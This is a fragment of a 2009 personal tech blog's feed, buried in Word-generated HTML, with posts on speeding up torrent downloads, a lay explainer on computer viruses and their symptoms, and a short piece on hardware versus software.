&lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;/p&gt;&lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;4 CLOSE BACKGROUND PROGRAMS WHILE DOWNLOADING : &lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt; &lt;/span&gt;&lt;span style="font-size:100%;"&gt;Although Torrent clients like Bit torrent ,u torrent are very small in size they consume large memory resources while the download is on so if any other memory consuming program runs parallel then the download speed is decreased. So try to close down all background programns while download is on &lt;/span&gt;&lt;span style="font-size:100%;"&gt; &lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;5. PRIVATE TORRENTZ&lt;/b&gt;&lt;b style=""&gt; : &lt;/b&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;I stumbled upon this while searching for a solution of my problem There are torrents called private torrents which give you a constant high speed. Google it u will find many sites offering u private torrents .u just hav to register for free.&lt;br /&gt;&lt;br /&gt;.for ppl who hav high bandwidth like me(around 2 mbps) u can use these torrents they give around 200 kb/s s download speed in a 2 MBPS line. The catch however is that u hav to maintain a atleast 0.3 upload/download speed ratio ..or else u will be banned form site..but if its just a single large download that is troubling u then ...fuck the rules ..get &lt;st1:city st="on"&gt;&lt;st1:place st="on"&gt;ur&lt;/st1:place&gt;&lt;/st1:city&gt; download ...get banned....n ......get hold of a new site...&lt;/span&gt;&lt;/p&gt;&lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link style="font-family: arial; color: rgb(255, 255, 255);" rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;span style="color: rgb(255, 255, 255);font-family:arial;font-size:100%;"  &gt;&lt;b style=""&gt;6 .SIMULTANEOUSLY DOWNLOAD 2 OR MORE TORRENTZ : &lt;/b&gt;&lt;/span&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link style="font-family: arial; color: rgb(255, 255, 255);" rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;In order to gain the maximum of the available bandwidth I suggest u download 2 or more torrentz.then at least the band width which was lying useless would be utilizes this is specially useful for users whose download speed exceeds 220-230 kb/s because often a torrent doesn’t utilize that much bandwidth(especially dose with peer/seed ratio of 2or more) so instead of queing up downloads it is better to download simultaneously. As long as the the total bandwidth is more than the cumulative bandwidth utilized by &lt;/span&gt;&lt;span style="font-size:100%;"&gt; &lt;/span&gt;&lt;span style="font-size:100%;"&gt;the torrents&lt;/span&gt;&lt;span style="font-size:100%;"&gt;   &lt;/span&gt;&lt;span style="font-size:100%;"&gt;then adding 1 more download will not affect the speed of the existing download in any way &lt;/span&gt;&lt;/p&gt;  &lt;p  style="color: rgb(255, 255, 255);font-family:arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;b style=""&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p face="arial" style="color: rgb(255, 255, 255);" class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;&lt;p style="color: rgb(255, 255, 255); font-family: arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p style="color: rgb(255, 255, 255); font-family: arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;for more info email me at : arka_b1990@yahoo.co.in&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="color: rgb(255, 255, 255); font-family: arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p style="color: rgb(255, 255, 255); font-family: arial;" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p face="arial" style="color: rgb(255, 255, 255);" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p face="arial" style="color: rgb(255, 255, 255);" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  &lt;p face="arial" style="color: rgb(255, 255, 255);" class="MsoNormal"&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;&lt;br /&gt;&lt;/p&gt;  &lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-6531837976907148636?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/6531837976907148636/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/increase-torrent-speed.html#comment-form' title='4 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6531837976907148636'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/6531837976907148636'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/increase-torrent-speed.html' title='INCREASE TORRENT SPEED'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_T53992hHLOM/SditIShhWTI/AAAAAAAAAEo/XzmM-_BRl14/s72-c/Torrent+.jpg' height='72' width='72'/><thr:total>4</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-5429972183838268040</id><published>2009-04-05T05:14:00.000-07:00</published><updated>2009-04-05T05:23:06.425-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HACKING'/><title type='text'>V.I.R.U.S</title><content type='html'>A computer virus is a computer program that can copy itself and infect a computer without the permission or knowledge of the owner. The term "virus" is also commonly but erroneously used to refer to other types of malware, adware and spyware programs that do not have the reproductive ability. A true virus can only spread from one computer to another (in some form of executable code) when its host is taken to the target computer; for instance because a user sent it over a network or the Internet, or carried it on a removable medium such as a floppy disk, CD, DVD, or USB drive. Viruses can increase their chances of spreading to other computers by infecting files on a network file system or a file system that is accessed by another computer.[1][2]&lt;br /&gt;Viruses are sometimes confused with computer worms and Trojan horses, which are technically different. A worm can use security vulnerabilities to spread itself to other computers without needing to be transferred as part of a host, and a Trojan horse is a program that appears harmless but has a hidden agenda. Worms and Trojans, like viruses, may cause harm to either a computer system's hosted data, functional performance, or networking throughput, when they are executed. Some viruses and other malware have symptoms noticeable to the computer user, but most are surreptitious. This makes it hard for the average user to notice, find and disable and is why specialist anti-virus programs are now commonplace.&lt;br /&gt;Most personal computers are now connected to the Internet and to local area networks, facilitating the spread of malicious code. Today's viruses may also take advantage of network services such as the World Wide Web, e-mail, Instant Messaging and file sharing systems to spread, blurring the line between viruses and worms. Furthermore, some sources use an alternative terminology in which a virus is any form of self-replicating malware.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;font-size:100%;" &gt;&lt;span style="color: rgb(0, 0, 0);"&gt;THE FIRST COMPUTER VIRUS&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;he Creeper virus was first detected on ARPANET, the forerunner of the Internet in the early 1970s.[3] Creeper was an experimental self-replicating program written by Bob Thomas at BBN in 1971.[4] Creeper used the ARPANET to infect DEC PDP-10 computers running the TENEX operating system. Creeper gained access via the ARPANET and copied itself to the remote system where the message, "I'm the creeper, catch me if you can!" was displayed. The Reaper program was created to delete Creeper.[5]&lt;br /&gt;A common misconception is that a program called "Rother J" was the first computer virus to appear "in the wild" — that is, outside the single computer or lab where it was created, but that claim is false. See the Timeline of notable computer viruses and worms for other earlier viruses. It was, however, the first virus to infect computers "in the home." Written in 1982 by Richard Skrenta, it attached itself to the Apple DOS 3.3 operating system and spread via floppy disk.[6] This virus was originally a joke, created by a high school student. It was injected in a game on a floppy disk. On its 50th use the Elk Cloner virus would be activated, infecting the computer and displaying a short poem beginning "Elk Cloner: The program with a personality." With time VIRUS’s became more and more complicated and nowadays they tend to be very compact and highly target specific&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;COUPLE OF MOST COMMON VIRUS CURRENTLY ON THE GO&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-style: italic; font-weight: bold;"&gt;MEDIACONTROL VIRUS&lt;/span&gt; – This code usually breaks into a system via email attachments .The most interesting about this virus is that it can slip past even the best antivirus software’s available in today’s market .Once in a system it changes the extension of all media files like .avi .flv. asf .wmv  to .jpeg which is the extension for an image file .The result is that whenever the user tries to play a song or a video, instead of media software’s like windows media player, image opening software like windows fax viewer starts and naturally it cant play the media files so it displays an error. One way of tackling this problem is again renaming the jpeg extension to the original extensions but there are so many media files present in any average PC it is impossible to remember each and every of their original extensions .If the original extension is not given the file becomes useless forever&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold; font-style: italic;"&gt;AUTORUN VIRUS &lt;/span&gt;– This virus sort of locks the drives of the PC.on the infected PC if the user tries to open the D drive (for that matter any drive)  then instead to opening up a messege is  displayed “Windows cannot open this file. To open this file windows needs to know the program which created it ” .Thus the drives are treated as unknown files which causes a great deal of problem in working with them.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;SYMPTOMS OF A VIRUS INFECTED COMPUTER&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;1. Abnormal program behavior in windows like being unable to view hidden files, unable to open hard disk, wrong disk volume information ,frequent errors&lt;br /&gt;&lt;br /&gt;2.  System slowdown ,PC taking too much time in loading startup items&lt;br /&gt;&lt;br /&gt;3. Blue screens of death which are popularly called BSOD&lt;br /&gt;4. Errors like&lt;br /&gt;“svchost.exe - Application Error The exception unknown software exception (0xc0000409) occurred in the application at location 0x5b86a3c0.”&lt;br /&gt;“unable to read memory referenced …”&lt;br /&gt;and frequent  “ this program has performed an illegal operation” messeges&lt;br /&gt;5.  And finally sudden system crashes&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;THE ABOVE ARE SYMPTOMS ONLY .THE ABOVE SIGNS DON’T GUARANTEE THAT A VIRUS IS PRESENT IN THE PC ,THESE CAN BE DUE TO HARDWARE ISSUES ,SOFTWARE CONFLICTS .HOWEVER THERE IS A HIGH PROBABILITY THAT THE SYSTEM IS INFECTED&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:85%;"&gt;mail me at &lt;/span&gt;&lt;span style="font-size:85%;"&gt;: arka_b1990@yahoo.co.in&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/1561084088417243739-5429972183838268040?l=arkatechie.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://arkatechie.blogspot.com/feeds/5429972183838268040/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://arkatechie.blogspot.com/2009/04/virus.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5429972183838268040'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1561084088417243739/posts/default/5429972183838268040'/><link rel='alternate' type='text/html' href='http://arkatechie.blogspot.com/2009/04/virus.html' title='V.I.R.U.S'/><author><name>Arka</name><uri>http://www.blogger.com/profile/07638533523649579733</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='30' height='32' src='http://4.bp.blogspot.com/_T53992hHLOM/ScVQvNBIyDI/AAAAAAAAADU/b7xTeuaNoGc/S220/maaaaaaaaaaaaapic.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1561084088417243739.post-6869537290794210890</id><published>2009-04-02T10:08:00.000-07:00</published><updated>2009-04-02T10:18:36.109-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Trivia&apos;s'/><title type='text'>HARDWARE VS SOFTWARE</title><content type='html'>&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="City"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} a:link, span.MsoHyperlink 	{color:blue; 	text-decoration:underline; 	text-underline:single;} a:visited, span.MsoHyperlinkFollowed 	{color:purple; 	text-decoration:underline; 	text-underline:single;} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} span.body 	{mso-style-name:body;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;&lt;meta equiv="Content-Type" content="text/html; charset=utf-8"&gt;&lt;meta name="ProgId" content="Word.Document"&gt;&lt;meta name="Generator" content="Microsoft Word 11"&gt;&lt;meta name="Originator" content="Microsoft Word 11"&gt;&lt;link rel="File-List" href="file:///C:%5CDOCUME%7E1%5Carka%5CLOCALS%7E1%5CTemp%5Cmsohtml1%5C01%5Cclip_filelist.xml"&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="City"&gt;&lt;/o:smarttagtype&gt;&lt;o:smarttagtype namespaceuri="urn:schemas-microsoft-com:office:smarttags" name="place"&gt;&lt;/o:smarttagtype&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:worddocument&gt;   &lt;w:view&gt;Normal&lt;/w:View&gt;   &lt;w:zoom&gt;0&lt;/w:Zoom&gt;   &lt;w:punctuationkerning/&gt;   &lt;w:validateagainstschemas/&gt;   &lt;w:saveifxmlinvalid&gt;false&lt;/w:SaveIfXMLInvalid&gt;   &lt;w:ignoremixedcontent&gt;false&lt;/w:IgnoreMixedContent&gt;   &lt;w:alwaysshowplaceholdertext&gt;false&lt;/w:AlwaysShowPlaceholderText&gt;   &lt;w:compatibility&gt;    &lt;w:breakwrappedtables/&gt;    &lt;w:snaptogridincell/&gt;    &lt;w:wraptextwithpunct/&gt;    &lt;w:useasianbreakrules/&gt;    &lt;w:dontgrowautofit/&gt;   &lt;/w:Compatibility&gt;   &lt;w:browserlevel&gt;MicrosoftInternetExplorer4&lt;/w:BrowserLevel&gt;  &lt;/w:WordDocument&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if gte mso 9]&gt;&lt;xml&gt;  &lt;w:latentstyles deflockedstate="false" latentstylecount="156"&gt;  &lt;/w:LatentStyles&gt; &lt;/xml&gt;&lt;![endif]--&gt;&lt;!--[if !mso]&gt;&lt;object classid="clsid:38481807-CA0E-42D2-BF39-B33AF135CC4D" id="ieooui"&gt;&lt;/object&gt; &lt;style&gt; st1\:*{behavior:url(#ieooui) } &lt;/style&gt; &lt;![endif]--&gt;&lt;style&gt; &lt;!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} p 	{mso-margin-top-alt:auto; 	margin-right:0in; 	mso-margin-bottom-alt:auto; 	margin-left:0in; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} span.body 	{mso-style-name:body;} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --&gt; &lt;/style&gt;&lt;!--[if gte mso 10]&gt; &lt;style&gt;  /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} &lt;/style&gt; &lt;![endif]--&gt;  &lt;p&gt;&lt;b&gt;Software&lt;/b&gt; is a general term used to describe a collection of computer programs, procedures, and documentation that perform some task on a computer system. Practical computer systems divide software systems into three major classes: system software, programming software, and application software, although the distinction is arbitrary and often blurred.&lt;/p&gt;  &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;&lt;b&gt;Hardware&lt;/b&gt; is best described as a device that is physically connected to the computer or something that can be physically touched. A CD-ROM, monitor, printer, and video card are all examples of computer hardware. Without any hardware your computer would not exist and software would have nothing to run on.&lt;/p&gt;  &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;  &lt;p&gt;Take the example of FIREWALL ..it can be termed as a software as well as a hardware How?.here is the answer &lt;span style=""&gt; &lt;/span&gt;&lt;span class="body"&gt;A &lt;u style="font-weight: bold; font-style: italic;"&gt;hardware firewall&lt;/u&gt; in a typical broadband router employs a technique called packet filtering, which examines the header of a packet to determine its source and destination addresses. A &lt;u style="font-weight: bold; font-style: italic;"&gt;software firewall&lt;/u&gt; is a program that blocks the PC from unauthorized access ever the net. Zone alarm &amp;amp; Comodo are 2 of the most popular firewalls available for free on the net. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;  